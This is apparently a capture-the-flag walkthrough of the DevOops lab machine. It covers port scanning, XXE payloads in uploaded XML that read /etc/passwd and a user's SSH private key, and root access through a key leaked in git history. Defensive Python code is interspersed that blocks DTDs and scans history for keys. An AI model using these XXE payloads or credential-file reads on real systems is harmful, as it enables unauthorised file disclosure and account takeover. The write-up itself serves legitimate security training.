# DevOops

<figure><img src="/files/Irw09t7dd5kAlrHLb2Vp" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running on them.

The following nmap command will quickly scan the target machine for open ports and save the output to a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.91 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scan the entire port range, **from 1 to 65535**.
* `-T5` **insane** timing template, the fastest of nmap's timing templates.
* `-Pn` assume the host is **online** (skip host discovery).
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allPorts* file.

{% code overflow="wrap" %}

```bash
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 18:47 CET
Nmap scan report for 10.10.10.91
Host is up (0.058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp

Nmap done: 1 IP address (1 host up) scanned in 14.02 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to identify the services and versions running on them. The following command will scan these ports in more depth and save the result into a file:

> nmap -sC -sV -p22,5000 10.10.10.91 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into a file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 18:49 CET
Nmap scan report for 10.10.10.91
Host is up (0.045s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4290e335318d8b86172afb3890dac495 (RSA)
|   256 b7b6dcc44c879b752a008983edb28031 (ECDSA)
|_  256 d52f1953b28e3a4bb3dd3c1fc0370d00 (ED25519)
5000/tcp open  http    Gunicorn 19.7.1
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: gunicorn/19.7.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.76 seconds
```

{% endcode %}

The website on port *5000* shows an `Under construction!` page.

<figure><img src="/files/W1vUcvFmzE9lI8EQ8GRo" alt=""><figcaption></figcaption></figure>

Let's try to see if there are any subdirectories or hidden files.

> gobuster dir -u http://10.10.10.91:5000/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 200 --no-error -x txt,php

* `dir` enumerates **directories or files**.
* `-u` the **target** URL.
* `-w` path to the **wordlist**.
* `-t` number of concurrent **threads**, in this case 200 threads.
* `--no-error` **hide** error messages.
* `-x` file **extensions** to append to each word, in this case `txt` and `php`.

```
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.91:5000/
[+] Method:                  GET
[+] Threads:                 200
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Extensions:              txt,php
[+] Timeout:                 10s
===============================================================
2022/11/21 18:53:24 Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 200) [Size: 347]
/feed                 (Status: 200) [Size: 546263]
/newpost              (Status: 405) [Size: 178]
===============================================================
2022/11/21 18:59:29 Finished
===============================================================
```

## Exploitation

The `/upload` page allows us to upload XML files with `Author`, `Subject` and `Content` elements.

<figure><img src="/files/VfSDx0KVV2wivxx1NZEv" alt=""><figcaption></figcaption></figure>

Let's try to upload a `test.xml` file containing the following XML.

```xml
<item>
<Author>alfa8sa</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>
```

<figure><img src="/files/cPOmBXjZIdohnloaxRNC" alt=""><figcaption></figcaption></figure>

The file was uploaded successfully. Since the submitted values are displayed on the page, we can try an XXE injection to read local files (an LFI). The following document declares an external entity that loads the `/etc/passwd` file and references it in the `Author` element, so the file content is displayed there.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

<item>
<Author>&xxe;</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>
```

<figure><img src="/files/6zAQ8N2bWherU7DAJ6gt" alt=""><figcaption></figcaption></figure>
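An added defender-side example, not code from the writeup or from the blogfeed application: a Python handler that accepts the `<item>` posts shown above but refuses any document carrying a DOCTYPE or entity declaration, so the `&xxe;` payload is rejected before the external entity is ever resolved. The two inputs are embedded as constructed samples copied from the documents above.

```python
import xml.parsers.expat
import xml.etree.ElementTree as ET

# Constructed samples: the benign post from the writeup and its XXE variant.
SAFE_POST = b"""<item>
<Author>alfa8sa</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>"""

XXE_POST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<item>
<Author>&xxe;</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>"""

class UnsafeXML(ValueError):
    """Raised when an upload carries a DOCTYPE or entity declaration."""

def reject_dtd(data: bytes) -> None:
    """Pre-scan with expat and abort on the first DTD construct.

    These callbacks fire before any entity is expanded, so the file://
    reference in an XXE payload is never followed.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE declarations are not accepted")

    def on_entity(*decl):
        raise UnsafeXML("entity declarations are not accepted")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.Parse(data, True)

def parse_post(data: bytes) -> dict:
    """Validate the upload, then extract the three fields the feed displays."""
    reject_dtd(data)
    root = ET.fromstring(data)
    if root.tag != "item":
        raise UnsafeXML("root element must be <item>")
    fields = {}
    for name in ("Author", "Subject", "Content"):
        node = root.find(name)
        fields[name] = (node.text or "").strip() if node is not None else ""
    return fields
```

The same outcome can be had with the `defusedxml` package, which patches the standard parsers to refuse DTDs and entity expansion.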

There is one user called `roosa`. Let's try to get her `id_rsa` key.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///home/roosa/.ssh/id_rsa"> ]>

<item>
<Author>&xxe;</Author>
<Subject>pwned</Subject>
<Content>Pwnedbyalfa8sa</Content>
</item>
```

<figure><img src="/files/407otr7v0M6yp53vI8Mx" alt=""><figcaption></figcaption></figure>

Now, let's create an `id_rsa` file with that key, give it the right permissions, and log in as the `roosa` user. Then we can grab the user flag.

> nano id_rsa
>
> chmod 600 id_rsa
>
> ssh -i id_rsa roosa@10.10.10.91

```
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Nov 21 13:20:06 2022 from 10.10.14.14
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

roosa@devoops:~$ whoami
roosa
roosa@devoops:~$ cat user.txt 
488649de359589f7fe73a164c95f5d75
```

## Privilege Escalation

If we search for git repositories, we'll find one in `/home/roosa/work/blogfeed/`.

> find / -name "*.git" 2>/dev/null

```
/srv/git/blogfeed.git
/home/roosa/work/blogfeed/.git
```

If we check the git log, we'll see one commit with the `reverted accidental commit with proper key` comment.

> cd /home/roosa/work/blogfeed/
>
> git log

```
...
commit 33e87c312c08735a02fa9c796021a4a3023129ad
Author: Roosa Hakkerson <roosa@solita.fi>
Date:   Mon Mar 19 09:33:06 2018 -0400

    reverted accidental commit with proper key
...
```

If we check the content of the commit, we'll see two private SSH keys.

> git show 33e87c312c08735a02fa9c796021a4a3023129ad

```
 -----BEGIN RSA PRIVATE KEY-----
-MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
-8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
...
+T3Sd/6nWVzi1FO16KjhRGrqwb6BCDxeyxG508hHzikoWyMN0AA2st8a8YS6jiOog
+bU34EzQLp7oRU/TKO6Mx5ibQxkZPIHfgA1+Qsu27yIwlprQ64+oeEr0=
 -----END RSA PRIVATE KEY-----
```
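Review bot: committing a replacement key on top of the leaked one does not remove the leak. The `-` lines of this hunk are the original key, and `git show 33e87c312c08735a02fa9c796021a4a3023129ad` prints them for anyone who can read the repository (here, the `roosa` user). The commit message "reverted accidental commit with proper key" describes the wrong fix: the exposed key has to be treated as compromised and rotated, and the commit purged from history, rather than reverted.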

Let's try to log in as root with the first one.

> nano /tmp/id_rsa
>
> chmod 600 /tmp/id_rsa

```
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEArDvzJ0k7T856dw2pnIrStl0GwoU/WFI+OPQcpOVj9DdSIEde
8PDgpt/tBpY7a/xt3sP5rD7JEuvnpWRLteqKZ8hlCvt+4oP7DqWXoo/hfaUUyU5i
...
oAvexd1JRMkbC7YOgrzZ9iOxHP+mg/LLENmHimcyKCqaY3XzqXqk9lOhA3ymOcLw
LS4O7JPRqVmgZzUUnDiAVuUHWuHGGXpWpz9EGau6dIbQaUUSOEE=
-----END RSA PRIVATE KEY-----
```

We'll see that the key is valid, and then all we have to do is reap the harvest and take the root flag.

> ssh -i /tmp/id_rsa root@localhost

```
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.13.0-37-generic i686)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

135 packages can be updated.
60 updates are security updates.

Last login: Mon Nov 21 14:18:45 2022 from 127.0.0.1
root@devoops:~# whoami
root
root@devoops:~# cat root.txt 
c5948adaf05042ec3d6c98f864440e4a
```
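An added defender-side example, not code from the writeup or the box: a Python check that lists every private key still reachable anywhere in a repository's history, reproducing the "revert" situation above in a constructed temporary repository. The file name `deploy.key`, the commit messages and the key bodies are made up; it assumes the `git` binary is on the PATH.

```python
import os
import subprocess
import tempfile

KEY_HEADER = "-----BEGIN RSA PRIVATE KEY-----"

def git(repo: str, *args: str) -> str:
    """Run one git command inside repo and return its stdout."""
    return subprocess.run(["git", *args], cwd=repo, check=True,
                          capture_output=True, text=True).stdout

def private_keys_in_history(repo: str) -> list:
    """First body line of every private key held by a blob reachable from any ref.

    A later commit that 'reverts' the key only adds a new blob; the old blob
    stays reachable, which is why git show on the reverting commit prints it.
    """
    found = set()
    for line in git(repo, "rev-list", "--all", "--objects").splitlines():
        sha, _, path = line.partition(" ")
        if not path or git(repo, "cat-file", "-t", sha).strip() != "blob":
            continue  # commits and trees carry no file content
        content = git(repo, "cat-file", "-p", sha)
        if KEY_HEADER in content:
            found.add(content.split(KEY_HEADER, 1)[1].strip().splitlines()[0])
    return sorted(found)

def build_demo_repo() -> str:
    """Constructed repository: commit a fake key, then overwrite it 'with the proper key'."""
    repo = tempfile.mkdtemp()
    git(repo, "init", "-q")
    git(repo, "config", "user.email", "demo@example.invalid")
    git(repo, "config", "user.name", "demo")
    keyfile = os.path.join(repo, "deploy.key")  # hypothetical file name
    for body, msg in (("FAKE-KEY-MATERIAL-ONE", "add deploy key"),
                      ("FAKE-KEY-MATERIAL-TWO", "reverted accidental commit with proper key")):
        with open(keyfile, "w") as fh:
            fh.write(f"{KEY_HEADER}\n{body}\n-----END RSA PRIVATE KEY-----\n")
        git(repo, "add", "deploy.key")
        git(repo, "commit", "-q", "-m", msg)
    return repo
```

Both fake keys are reported even though only the second one is in the working tree, which is the check a pre-push hook or secret scanner has to make against history, not just the current tree.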
